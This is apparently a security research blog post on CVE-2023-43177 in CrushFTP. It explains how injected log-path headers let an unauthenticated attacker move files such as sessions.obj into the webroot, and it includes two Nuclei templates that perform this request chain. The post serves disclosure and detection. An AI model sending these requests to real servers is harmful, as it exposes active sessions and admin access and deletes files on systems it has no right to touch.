CVE-2023-43177 is a critical vulnerability in CrushFTP. The vulnerability could potentially allow unauthenticated attackers with network access to the CrushFTP Instance to write files in the local file system and eventually in some versions could allow the executing of arbitrary system commands.
Technical Details
Based on the information shared in the original blog post at https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/, we embarked on an effort to gain a deeper understanding of the vulnerability. In the CrushFTP application, a default behaviour exists where it issues an anonymous authenticated session cookie when a request is made. Consequently, this results in a blurred distinction between an authenticated user and an unauthenticated user.
The application's logic functions in the following manner: when the request includes the as2-to header, the keys within the user_info session object are sourced from user input, specifically from the request headers. Subsequently, at the conclusion of request processing, a function call to drain_log() is executed, which logs the request's details, including specific request headers, in the log files, along with other pertinent information.
Interestingly, the locations where the log entries are written are determined by specific keys within the "user_info" session object. Because these keys can be supplied via the request header, owing to the existence of the "as2-to" header, it becomes possible for an attacker to potentially gain control over the location or even the log file itself.
These are the headers responsible for altering the logic of logs writing:
- user_log_path - The directory from where the file needs to be moved (moved because the file will be deleted if successfully moved).
- user_log_file - The filename that gets moved.
- user_log_path_custom - The new location where logs should be written.
- dont_log - If not set to "true", doesn't log (append) anything in the file.
In other words, this means that we have the capability to copy any file from the filesystem to the webroot; however, it's important to note that the file will be removed from its original location. Within the application directory, there exists a vital file named "sessions.obj" which houses essential details about currently active sessions. Interestingly, this file is automatically recreated if it is deleted. Therefore, it represents the perfect target for exploiting this vulnerability, as gaining access to "sessions.obj" would potentially grant an attacker admin privileges to the CrushFTP instance.
Nuclei template to detect CVE-2023-43177 on CrushFTP 10.5
id: CVE-2023-43177
info:
name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-43177
- https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
- https://blog.projectdiscovery.io/crushftp-rce/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-43177
cwe-id: CWE-913
epss-score: 0.00106
epss-percentile: 0.42673
cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: crushftp
product: crushftp
tags: cve,cve2023,crushftp,unauth,rce
flow: http(1) && http(2) && http(3)
variables:
dirname: "{{randbase(8)}}"
http:
- method: GET
path:
- "{{BaseURL}}/WebInterface"
matchers:
- type: dsl
dsl:
- contains_all(to_lower(header), "currentauth", "crushauth")
- method: POST
path:
- "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
headers:
Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
as2-to: X
user_name: crushadmin{{randstr}}
user_log_path: "./"
user_log_path_custom: "./WebInterface/{{dirname}}/"
user_log_file: sessions.obj
dont_log: true
Content-Type: application/x-www-form-urlencoded
body: |
post=body
- method: GET
path:
- "{{BaseURL}}/WebInterface/{{dirname}}/sessions.obj"
max-size: 5000
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(header, 'application/binary')
- contains_any(to_lower(header), 'webinterface', 'crushftp')
condition: and
extractors:
- type: dsl
dsl:
- content_lengthHowever, we observed that in our specific version, this exploit didn't perform as anticipated. Following the usual process of decompiling and debugging, we uncovered a crucial distinction. In versions before approximately 10.4, the logic did not incorporate "user_log_path_custom" in the log-writing workflow. Instead, the mechanism in place involves the creation of a specified directory or file and logging the request into it, rather than simply copying a file. Consequently, while this approach provides a file write primitive anywhere in the system, it doesn't afford complete control over the content. As a result, it appears that exploiting it for remote code execution may not be feasible, or at least, not based on our current understanding.
Nuclei template to detect CVE-2023-43177 on <= CrushFTP 10.4
id: CVE-2023-43177
info:
name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-43177
- https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
- https://blog.projectdiscovery.io/crushftp-rce/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-43177
cwe-id: CWE-913
epss-score: 0.00106
epss-percentile: 0.42673
cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: crushftp
product: crushftp
tags: cve,cve2023,crushftp,unauth,rce
flow: http(1) && http(2) && http(3)
variables:
dirname: "{{randbase(5)}}"
filename: "{{randbase(5)}}"
http:
- method: GET
path:
- "{{BaseURL}}/WebInterface"
matchers:
- type: dsl
dsl:
- contains_all(to_lower(header), "currentauth", "crushauth")
- method: POST
path:
- "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
headers:
Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
as2-to: X
user_name: crushadmin{{dirname}}
user_log_path: "./WebInterface/{{dirname}}/"
user_log_file: "{{filename}}"
Content-Type: application/x-www-form-urlencoded
body: |
post=body
matchers:
- type: regex
regex:
- "crushadmin"
- method: GET
path:
- "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "crushadmin{{dirname}}")
condition: andBy embracing Nuclei and participating in the open-source community or joining the ProjectDiscovery Cloud Platform, organizations can strengthen their security defenses, stay ahead of emerging threats, and create a safer digital environment. Security is a collective effort, and together we can continuously evolve and tackle the challenges posed by cyber threats.
- Rahul Maini, Harsh Jaiswal @ ProjectDiscovery Research
